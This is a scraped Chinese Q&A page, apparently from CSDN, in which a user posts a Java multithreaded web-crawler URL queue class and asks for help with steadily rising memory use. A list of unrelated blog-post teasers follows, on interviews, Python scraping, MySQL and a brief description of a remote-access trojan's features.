java.util.concurrent.*; import java.util.*; public class URLMap { //待抓取的URL队列 private LinkedList&lt;string&gt; URLQueue; //缓存解析出来的URL,使用Hash方便快速查找,&lt;k,false&gt;表示未抓取,&lt;k,true&gt;表示抓取结束 private HashMap&lt;string,boolean&gt; cachedURL; private HashSet&lt;string&gt; hosts; private HashSet&lt;string&gt; format_limit; //默认构造器,初始化队列,集合 private URLMap() { URLQueue=new LinkedList&lt;string&gt;(); cachedURL=new HashMap&lt;string,boolean&gt;(50000); hosts=new HashSet&lt;string&gt;(20); format_limit=new HashSet&lt;string&gt;(20); } public URLMap(List&lt;string&gt; seeds) { this(); for(String s:seeds) cachedURL.put(s, false); URLQueue.addAll(seeds); for (String string : seeds) { try { URL test=new URL(string); String host=test.getHost(); hosts.add(host); } catch (MalformedURLException e) { e.printStackTrace(); } } } public URLMap(String seed) { this(); cachedURL.put(seed, false); URLQueue.add(seed); try { URL test=new URL(seed); hosts.add(test.getHost()); } catch (MalformedURLException e) { e.printStackTrace(); } } //将解析出来的URL添加到URLMap中,如果有重复则忽略,URL有效性由外部保证,该方法是线程安全的 public synchronized void addURL(String url) throws InterruptedException { //如果该URL已存在,忽略该URL if(cachedURL.keySet().contains(url)) return; cachedURL.put(url, false); URLQueue.add(url); //有可用URL,唤醒所有阻塞线程 notifyAll(); } //将解析出来的URL添加到URLMap中,如果有重复则忽略,URL有效性由外部保证,该方法是同步的 public synchronized void addAll(List&lt;string&gt; urls) throws InterruptedException { for (String url : urls) { if(cachedURL.keySet().contains(url)) continue; cachedURL.put(url,false); URLQueue.add(url); } notifyAll(); } //从当前URL队列中获取一个URL,如果当前队列无可用URL,则该线程进入阻塞状态 public synchronized String getURL() throws InterruptedException { //该处进入阻塞 while(URLQueue.size()==0) wait(); //将其从队列中删除 String url=URLQueue.remove(); cachedURL.put(url, true); return url; } public boolean testHost(String host) { for(String host_allow:hosts) { if(host.contains(host_allow)) return true; } return false; } public void addHost(List&lt;string&gt; l) { hosts.addAll(l); } public void addLimit(List&lt;string&gt; l) { format_limit.addAll(l); } public boolean testLimit(String url) { if(format_limit.size()==0) return true; else { for(String s:format_limit) if(url.contains(s)) return true; } return false; } //将待抓取队列打乱 private int swap_check=0; public synchronized void shuffle() { swap_check++; int size=URLQueue.size(); if(size&lt;1000) { java.util.Collections.shuffle(URLQueue); swap_check=0; } else { if(size&gt;=1000 &amp;&amp; size&lt;5000) { if(swap_check==5) { java.util.Collections.shuffle(URLQueue); swap_check=0; } } else { if(swap_check==15) { java.util.Collections.shuffle(URLQueue); swap_check=0; } } } } } </pre> <p><br /><br />附件里是内存使用情况<br /><strong>问题补充</strong><br />主要占用内存的是char[] <br />我的策略是所有分析到的有效URL都存储在HashMap中 <br />但是几万个URL不至于占用大多数内存吧? <br />我的工作线程只有5个,设置的多了,一会就崩了 <br /><br />哪位高人路过,帮我看眼吧 <br />祝你新年好运~</p> <p> </p> <p>附件里是内存占用,缓存的URL总数是20000个,一个大概占用80B,程序内存总数是150MB</p> <p>我不知道到底是什么东西不停的吃内存,回收不掉,程序运行的时间越长,线程数越多,内存吃的越快</p>
终于明白阿里百度这样的大公司,为什么面试经常拿ThreadLocal考验求职者了
点击上面↑「爱开发」关注我们每晚10点,捕获技术思考和创业资源洞察什么是ThreadLocalThreadLocal是一个本地线程副本变量工具类,各个线程都拥有一份线程私有的数
《奇巧淫技》系列-python!!每天早上八点自动发送天气预报邮件到QQ邮箱
此博客仅为我业余记录文章所用,发布到此,仅供网友阅读参考,如有侵权,请通知我,我会删掉。 补充 有不少读者留言说本文章没有用,因为天气预报直接打开手机就可以收到了,为何要多此一举发送到邮箱呢!!!那我在这里只能说:因为你没用,所以你没用!!! 这里主要介绍的是思路,不是天气预报!不是天气预报!!不是天气预报!!!天气预报只是用于举例。请各位不要再刚了!!! 下面是我会用到的两个场景: 每日下
面试官问我:什么是消息队列?什么场景需要他?用了会出现什么问题?
你知道的越多,你不知道的越多 点赞再看,养成习惯 GitHub上已经开源 https://github.com/JavaFamily 有一线大厂面试点脑图、个人联系方式,欢迎Star和完善 前言 消息队列在互联网技术存储方面使用如此广泛,几乎所有的后端技术面试官都要在消息队列的使用和原理方面对小伙伴们进行360°的刁难。 作为一个在互联网公司面一次拿一次Offer的面霸,打败了无数
8年经验面试官详解 Java 面试秘诀
    作者 | 胡书敏 责编 | 刘静 出品 | CSDN(ID:CSDNnews) 本人目前在一家知名外企担任架构师,而且最近八年来,在多家外企和互联网公司担任Java技术面试官,前后累计面试了有两三百位候选人。在本文里,就将结合本人的面试经验,针对Java初学者、Java初级开发和Java开发,给出若干准备简历和准备面试的建议。   Java程序员准备和投递简历的实
究竟你适不适合买Mac?
我清晰的记得,刚买的macbook pro回到家,开机后第一件事情,就是上了淘宝网,花了500元钱,找了一个上门维修电脑的师傅,上门给我装了一个windows系统。。。。。。 表砍我。。。 当时买mac的初衷,只是想要个固态硬盘的笔记本,用来运行一些复杂的扑克软件。而看了当时所有的SSD笔记本后,最终决定,还是买个好(xiong)看(da)的。 已经有好几个朋友问我mba怎么样了,所以今天尽量客观
MyBatis研习录(01)——MyBatis概述与入门
C语言自学完备手册(33篇) Android多分辨率适配框架 JavaWeb核心技术系列教程 HTML5前端开发实战系列教程 MySQL数据库实操教程(35篇图文版) 推翻自己和过往——自定义View系列教程(10篇) 走出思维困境,踏上精进之路——Android开发进阶精华录 讲给Android程序员看的前端系列教程(40集免费视频教程+源码) 版权声明 本文原创作者:谷哥的小弟 作者博客
程序员一般通过什么途径接私活?
二哥,你好,我想知道一般程序猿都如何接私活,我也想接,能告诉我一些方法吗? 上面是一个读者“烦不烦”问我的一个问题。其实不止是“烦不烦”,还有很多读者问过我类似这样的问题。 我接的私活不算多,挣到的钱也没有多少,加起来不到 20W。说实话,这个数目说出来我是有点心虚的,毕竟太少了,大家轻喷。但我想,恰好配得上“一般程序员”这个称号啊。毕竟苍蝇再小也是肉,我也算是有经验的人了。 唾弃接私活、做外
Python爬虫爬取淘宝,京东商品信息
小编是一个理科生,不善长说一些废话。简单介绍下原理然后直接上代码。 使用的工具(Python+pycharm2019.3+selenium+xpath+chromedriver)其中要使用pycharm也可以私聊我selenium是一个框架可以通过pip下载 pip install selenium -i https://pypi.tuna.tsinghua.edu.cn/simple/ 
阿里程序员写了一个新手都写不出的低级bug,被骂惨了。
你知道的越多,你不知道的越多 点赞再看,养成习惯 本文 GitHub https://github.com/JavaFamily 已收录,有一线大厂面试点思维导图,也整理了很多我的文档,欢迎Star和完善,大家面试可以参照考点复习,希望我们一起有点东西。 前前言 为啥今天有个前前言呢? 因为你们的丙丙啊,昨天有牌面了哟,直接被微信官方推荐,知乎推荐,也就仅仅是还行吧(心里乐开花)
Java工作4年来应聘要16K最后没要,细节如下。。。
前奏: 今天2B哥和大家分享一位前几天面试的一位应聘者,工作4年26岁,统招本科。 以下就是他的简历和面试情况。 基本情况: 专业技能: 1、&nbsp;熟悉Sping了解SpringMVC、SpringBoot、Mybatis等框架、了解SpringCloud微服务 2、&nbsp;熟悉常用项目管理工具:SVN、GIT、MAVEN、Jenkins 3、&nbsp;熟悉Nginx、tomca
Python爬虫精简步骤1 获取数据
爬虫的工作分为四步: 1.获取数据。爬虫程序会根据我们提供的网址,向服务器发起请求,然后返回数据。 2.解析数据。爬虫程序会把服务器返回的数据解析成我们能读懂的格式。 3.提取数据。爬虫程序再从中提取出我们需要的数据。 4.储存数据。爬虫程序把这些有用的数据保存起来,便于你日后的使用和分析。 这一篇的内容就是:获取数据。 首先,我们将会利用一个强大的库——requests来获取数据。 在电脑上安装
Python绘图,圣诞树,花,爱心 | Turtle篇
1.画圣诞树 import turtle screen = turtle.Screen() screen.setup(800,600) circle = turtle.Turtle() circle.shape('circle') circle.color('red') circle.speed('fastest') circle.up() square = turtle.Turtle()
作为一个程序员,CPU的这些硬核知识你必须会!
CPU对每个程序员来说,是个既熟悉又陌生的东西? 如果你只知道CPU是中央处理器的话,那可能对你并没有什么用,那么作为程序员的我们,必须要搞懂的就是CPU这家伙是如何运行的,尤其要搞懂它里面的寄存器是怎么一回事,因为这将让你从底层明白程序的运行机制。 随我一起,来好好认识下CPU这货吧 把CPU掰开来看 对于CPU来说,我们首先就要搞明白它是怎么回事,也就是它的内部构造,当然,CPU那么牛的一个东
破14亿,Python分析我国存在哪些人口危机!
2020年1月17日,国家统计局发布了2019年国民经济报告,报告中指出我国人口突破14亿。 猪哥的朋友圈被14亿人口刷屏,但是很多人并没有看到我国复杂的人口问题:老龄化、男女比例失衡、生育率下降、人口红利下降等。 今天我们就来分析一下我们国家的人口数据吧! 更多有趣分析教程,扫描下方二维码关注vx公号「裸睡的猪」 即可查看! 一、背景 1.人口突破14亿 2020年1月17日,国家统计局发布
web前端javascript+jquery知识点总结
Javascript javascript 在前端网页中占有非常重要的地位,可以用于验证表单,制作特效等功能,它是一种描述语言,也是一种基于对象(Object)和事件驱动并具有安全性的脚本语言 ,语法同java类似,是一种解释性语言,边执行边解释。 JavaScript的组成: ECMAScipt 用于描述: 语法,变量和数据类型,运算符,逻辑控制语句,关键字保留字,对象。 浏览器对象模型(Br
Python实战:抓肺炎疫情实时数据,画2019-nCoV疫情地图
文章目录1. 前言2. 数据下载3. 数据处理4. 数据可视化 1. 前言 今天,群里白垩老师问如何用python画武汉肺炎疫情地图。白垩老师是研究海洋生态与地球生物的学者,国家重点实验室成员,于不惑之年学习python,实为我等学习楷模。先前我并没有关注武汉肺炎的具体数据,也没有画过类似的数据分布图。于是就拿了两个小时,专门研究了一下,遂成此文。 2月6日追记:本文发布后,腾讯的数据源多次变更u
听说想当黑客的都玩过这个Monyer游戏(1~14攻略)
第零关 进入传送门开始第0关(游戏链接) 请点击链接进入第1关: 连接在左边→ ←连接在右边 看不到啊。。。。(只能看到一堆大佬做完的留名,也能看到菜鸡的我,在后面~~) 直接fn+f12吧 &lt;span&gt;连接在左边→&lt;/span&gt; &lt;a href="first.php"&gt;&lt;/a&gt; &lt;span&gt;←连接在右边&lt;/span&gt; o
在家远程办公效率低?那你一定要收好这个「在家办公」神器!
相信大家都已经收到国务院延长春节假期的消息,接下来,在家远程办公可能将会持续一段时间。 但是问题来了。远程办公不是人在电脑前就当坐班了,相反,对于沟通效率,文件协作,以及信息安全都有着极高的要求。有着非常多的挑战,比如: 1在异地互相不见面的会议上,如何提高沟通效率? 2文件之间的来往反馈如何做到及时性?如何保证信息安全? 3如何规划安排每天工作,以及如何进行成果验收? ......
作为一个程序员,内存和磁盘的这些事情,你不得不知道啊!!!
截止目前,我已经分享了如下几篇文章: 一个程序在计算机中是如何运行的?超级干货!!! 作为一个程序员,CPU的这些硬核知识你必须会! 作为一个程序员,内存的这些硬核知识你必须懂! 这些知识可以说是我们之前都不太重视的基础知识,可能大家在上大学的时候都学习过了,但是嘞,当时由于老师讲解的没那么有趣,又加上这些知识本身就比较枯燥,所以嘞,大家当初几乎等于没学。 再说啦,学习这些,也看不出来有什么用啊!
渗透测试-灰鸽子远控木马
木马概述 灰鸽子( Huigezi),原本该软件适用于公司和家庭管理,其功能十分强大,不但能监视摄像头、键盘记录、监控桌面、文件操作等。还提供了黑客专用功能,如:伪装系统图标、随意更换启动项名称和表述、随意更换端口、运行后自删除、毫无提示安装等,并采用反弹链接这种缺陷设计,使得使用者拥有最高权限,一经破解即无法控制。最终导致被黑客恶意使用。原作者的灰鸽子被定义为是一款集多种控制方式于一体的木马程序
Python:爬取疫情每日数据
前言 有部分同学留言说为什么412,这是因为我代码里全国的cookies需要你自己打开浏览器更新好后替换,而且这个cookies大概只能持续20秒左右! 另外全国卫健委的数据格式一直在变,也有可能会导致爬取失败! 我现在已根据2月14日最新通报稿的格式修正了! 目前每天各大平台,如腾讯、今日头条都会更新疫情每日数据,他们的数据源都是一样的,主要都是通过各地的卫健委官网通报。 为什么已经有大量平台做
这个世界上人真的分三六九等,你信吗?
偶然间,在知乎上看到一个问题 一时间,勾起了我深深的回忆。 以前在厂里打过两次工,做过家教,干过辅导班,做过中介。零下几度的晚上,贴过广告,满脸、满手地长冻疮。   再回首那段岁月,虽然苦,但让我学会了坚持和忍耐。让我明白了,在这个世界上,无论环境多么的恶劣,只要心存希望,星星之火,亦可燎原。   下文是原回答,希望能对你能有所启发。   如果我说,这个世界上人真的分三六九等,
B 站上有哪些很好的学习资源?
哇说起B站,在小九眼里就是宝藏般的存在,放年假宅在家时一天刷6、7个小时不在话下,更别提今年的跨年晚会,我简直是跪着看完的!! 最早大家聚在在B站是为了追番,再后来我在上面刷欧美新歌和漂亮小姐姐的舞蹈视频,最近两年我和周围的朋友们已经把B站当作学习教室了,而且学习成本还免费,真是个励志的好平台ヽ(.◕ฺˇд ˇ◕ฺ;)ノ 下面我们就来盘点一下B站上优质的学习资源: 综合类 Oeasy: 综合
雷火神山直播超两亿,Web播放器事件监听是怎么实现的?
Web播放器解决了在手机浏览器和PC浏览器上播放音视频数据的问题,让视音频内容可以不依赖用户安装App,就能进行播放以及在社交平台进行传播。在视频业务大数据平台中,播放数据的统计分析非常重要,所以Web播放器在使用过程中,需要对其内部的数据进行收集并上报至服务端,此时,就需要对发生在其内部的一些播放行为进行事件监听。 那么Web播放器事件监听是怎么实现的呢? 01 监听事件明细表 名
3万字总结,Mysql优化之精髓
本文知识点较多,篇幅较长,请耐心学习 MySQL已经成为时下关系型数据库产品的中坚力量,备受互联网大厂的青睐,出门面试想进BAT,想拿高工资,不会点MySQL优化知识,拿offer的成功率会大大下降。 为什么要优化 系统的吞吐量瓶颈往往出现在数据库的访问速度上 随着应用程序的运行,数据库的中的数据会越来越多,处理时间会相应变慢 数据是存放在磁盘上的,读写速度无法和内存相比 如何优化 设计
Python新型冠状病毒疫情数据自动爬取+统计+发送报告+数据屏幕(三)发送篇
今天介绍的项目是使用 Itchat 发送统计报告 项目功能设计: 定时爬取疫情数据存入Mysql 进行数据分析制作疫情报告 使用itchat给亲人朋友发送分析报告(本文) 基于Django做数据屏幕 使用Tableau做数据分析 来看看最终效果 目前已经完成,预计2月12日前更新 使用 itchat 发送数据统计报告 itchat 是一个基于 web微信的一个框架,但微信官方并不允
作为程序员的我,大学四年一直自学,全靠这些实用工具和学习网站!
我本人因为高中沉迷于爱情,导致学业荒废,后来高考,毫无疑问进入了一所普普通通的大学,实在惭愧...... 我又是那么好强,现在学历不行,没办法改变的事情了,所以,进入大学开始,我就下定决心,一定要让自己掌握更多的技能,尤其选择了计算机这个行业,一定要多学习技术。 在进入大学学习不久后,我就认清了一个现实:我这个大学的整体教学质量和学习风气,真的一言难尽,懂的人自然知道怎么回事? 怎么办?我该如何更好的提升
粒子群算法求解物流配送路线问题(python)
粒子群算法求解物流配送路线问题(python) 1.查找论文文献 找一篇物流配送路径优化+粒子群算法求解的论文 参考文献:基于混沌粒子群算法的物流配送路径优化 2.了解粒子群算法的原理 讲解通俗易懂,有数学实例的博文:https://blog.csdn.net/daaikuaichuan/article/details/81382794 3.确定编码方式和解码策略 3.1编码方式 物流配送路线的
教你如何编写第一个简单的爬虫
很多人知道爬虫,也很想利用爬虫去爬取自己想要的数据,那么爬虫到底怎么用呢?今天就教大家编写一个简单的爬虫。 下面以爬取笔者的个人博客网站为例获取第一篇文章的标题名称,教大家学会一个简单的爬虫。 第一步:获取页面 #!/usr/bin/python # coding: utf-8 import requests #引入包requests link = "http://www.santostang.
前端JS初级面试题二 (。•ˇ‸ˇ•。)老铁们!快来瞧瞧自己都会了么
1. 传统事件绑定和符合W3C标准的事件绑定有什么区别? 传统事件绑定 &lt;div onclick=""&gt;123&lt;/div&gt; div1.onclick = function(){}; &lt;button onmouseover=""&gt;&lt;/button&gt; 注意: 如果给同一个元素绑定了两次或多次相同类型的事件,那么后面的绑定会覆盖前面的绑定 (不支持DOM事...
情人节来了,教你个用 Python 表白的技巧
作者:@明哥 公众号:Python编程时光 2020年,这个看起来如此浪漫的年份,你还是一个人吗? 难不成我还能是一条狗? 18年的时候,写过一篇介绍如何使用 Python 来表白的文章。 虽然创意和使用效果都不错,但有一缺点,这是那个exe文件,女神需要打开电脑,才有可能参与进来,进而被你成功"调戏”。 由于是很早期的文章了,应该有很多人没有看过。 没有看过的,你可以点击这里查看:用Pyt...
用Python开发实用程序 – 计算器
作者:隋顺意 一段时间前,自己制作了一个库 “sui-math”。这其实是math的翻版。做完后,python既然可以轻易的完成任何的数学计算,何不用python开发一个小程序专门用以计算呢? 现在我们越来越依赖于计算器,很多复杂的计算都离不开它。我们使用过各式各样的计算器,无论是电脑自带的,还是网也上的计算器,却都没有自己动手编写属于自己计算器。今天就让我们走进计算器的世界,用python来编写...
经典算法(19)教你两分钟学会【选择排序】
这篇博客使用图文并茂的方式讲解选择排序算法,并有完整的算法逻辑以及代码实现。
Python学习笔记(语法篇)
本篇博客大部分内容摘自埃里克·马瑟斯所著的《Python编程:从入门到实战》(入门类书籍),采用举例的方式进行知识点提要 关于Python学习书籍推荐文章 《学习Python必备的8本书》 Python语法特点: 通过缩进进行语句组织 不需要变量或参数的声明 冒号 1 变量和简单数据结构 1.1 变量命名 只能包含字母、数字和下划线,且不能以数字打头。 1.2 字符串 在Python中,用引号...
用Python打造你的专属情人节贺卡,赶快发给TA浪漫一下吧
明天就是情人节了。这个情人节,注定是一个不能约会的情人节,但不能约会不代表不能浪漫。古人比我们出生早,那些浪漫的诗词早都被他们挖掘一空,比诗词我们肯定没有机会了。好在我们还有Python,不然都不知道该如何表达浪漫。接下来,浪导教你制作一个浪漫的情人节专属贺卡。
Python绘图与可视化
文章目录使用的库Matplotlib程序包绘图命令的扩展及其属性设置 使用的库 Python有很多可视化工具,如:Matplotlib。 Matplotlib是一种2D的绘图库,它可以支持硬拷贝和跨系统的交互,它可以在Python脚本、IPython的交互环境下、Web应用程序中使用。如果结合使用一种GUI工具包(如IPython),Matplotlib还具有诸如缩放和平移等交互功能。它不仅支持各...
相关热词 c#开发的dll注册 c#的反射 c# grid绑定数据源 c#多线程怎么循环 c# 鼠标左键 c# char占位符 c# 日期比较 c#16进制转换为int c#用递归求顺序表中最大 c#小型erp源代码
立即提问